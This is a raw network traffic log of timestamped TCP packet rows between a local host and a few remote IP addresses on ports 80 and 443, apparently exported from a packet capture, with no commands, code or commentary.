Nov 30, 2024 04:06:25.100048065 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:25.102655888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:25.102926016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:25.222840071 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:25.222879887 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:25.223123074 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:25.223124981 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:25.223202944 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:25.343158007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:25.684967995 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.685089111 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.685142994 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.687149048 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.687149048 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.687160015 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.687169075 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.726754904 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.726792097 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.726874113 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.727634907 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:25.727643967 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:26.611172915 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611191034 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611202955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611234903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611268044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611342907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611355066 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611391068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611413956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611491919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611510038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611521959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611532927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611532927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611548901 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.611548901 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611565113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.611601114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.731328011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.731345892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.731378078 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.731401920 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.812438011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.812490940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.812525988 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.812561989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.816524982 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.816570044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.816643953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.816679955 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.824955940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.825000048 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.825076103 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.825113058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.833400011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.833440065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.833518982 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.833550930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.841820002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.841860056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.841866016 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.841903925 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.850250959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.850296974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.850346088 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.850389004 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.858638048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.858688116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.858745098 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.858783007 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.867064953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.867113113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.867172003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.867218018 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.875505924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.875564098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.875592947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.875638962 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.883157015 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.883244991 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.883260012 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.883301020 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.890784979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.890834093 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.890968084 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.891016006 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:26.932486057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:26.932562113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.013469934 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.013562918 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.013603926 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.013650894 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.016253948 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.016300917 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.016331911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.016379118 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.020565033 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.020611048 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.020673990 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.020719051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.026158094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.026201963 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.026299953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.026341915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.031708002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.031752110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.031816006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.031860113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.032615900 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.032682896 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.033809900 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.033821106 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.034060955 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.035198927 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.035214901 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:27.035259962 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:27.037319899 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.037367105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.037406921 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.037451982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.042943001 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.042989969 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.042996883 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.043041945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.048492908 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.048540115 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.048657894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.048702002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.054089069 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.054133892 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.054197073 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.054240942 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.059698105 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.059741020 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.059803963 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.059848070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.065336943 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.065749884 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.065797091 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.069153070 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.069252014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.069294930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.072998047 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.073093891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.073142052 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.076877117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.076921940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.076986074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.077035904 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.080722094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.080813885 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.080873013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.084595919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.084719896 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.084762096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.088459969 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.088577986 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.088625908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.092339993 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.092453003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.092500925 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.096203089 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.096313953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.096371889 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.100217104 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.100416899 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.100482941 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.103909969 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.104032993 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.104090929 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.107772112 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.107897997 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.107943058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.111619949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.114597082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.214653969 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.214775085 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.214806080 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.214821100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.216259003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.216304064 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.216339111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.216386080 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.219345093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.219391108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.219455957 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.219499111 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.222457886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.222501993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.222565889 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.222610950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.225562096 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.225609064 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.225720882 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.225764036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.228565931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.228610992 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.228669882 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.228710890 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.231503010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.231549025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.231594086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.231636047 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.234371901 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.234415054 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.234484911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.234528065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.237144947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.237190008 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.237240076 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.237302065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.239960909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.240005016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.240042925 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.240087986 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.242747068 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.242790937 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.242856026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.242897034 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.245537996 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.245582104 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.245651007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.245695114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.248301983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.248348951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.248404026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.248450041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.251105070 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.251154900 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.251198053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.251243114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.253873110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.253916979 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.253978014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.254024029 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.256675959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.256721973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.256789923 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.256834984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.259475946 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.259517908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.259574890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.259618998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.262238979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.262284040 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.262341022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.262382984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.265048027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.265089035 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.265146971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.265189886 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.267801046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.267846107 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.267954111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.267997026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.270613909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.270658970 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.270771027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.270814896 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.273391962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.273435116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.273461103 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.273535013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.276192904 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.276237011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.276292086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.276336908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.278974056 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.279017925 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.279078960 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.279120922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.281759024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.281805992 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.281848907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.281894922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.284567118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.284610987 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.284645081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.284688950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.287331104 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.287375927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.287436962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.287480116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.290148020 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.290194035 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.290266991 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.290311098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.292915106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.292960882 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.293088913 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.293138027 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.295716047 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.295762062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.295835972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.295885086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.298486948 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.298531055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.298590899 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.298630953 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.301270962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.301316023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.301318884 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.301363945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.304037094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.304075956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.415957928 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.416085005 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.416126013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.416155100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.417074919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.417124033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.417191982 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.417234898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.419260979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.419310093 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.419370890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.419415951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.421421051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.421524048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.421578884 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.423629045 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.423686028 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.423713923 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.423752069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.425694942 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.425740957 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.425806999 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.425849915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.427747965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.427797079 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.427856922 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.427900076 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.429843903 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.429892063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.429955006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.429996967 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.431902885 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:27.431962967 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:27.432015896 CET	80	49800	185.215.113.16	192.168.2.4
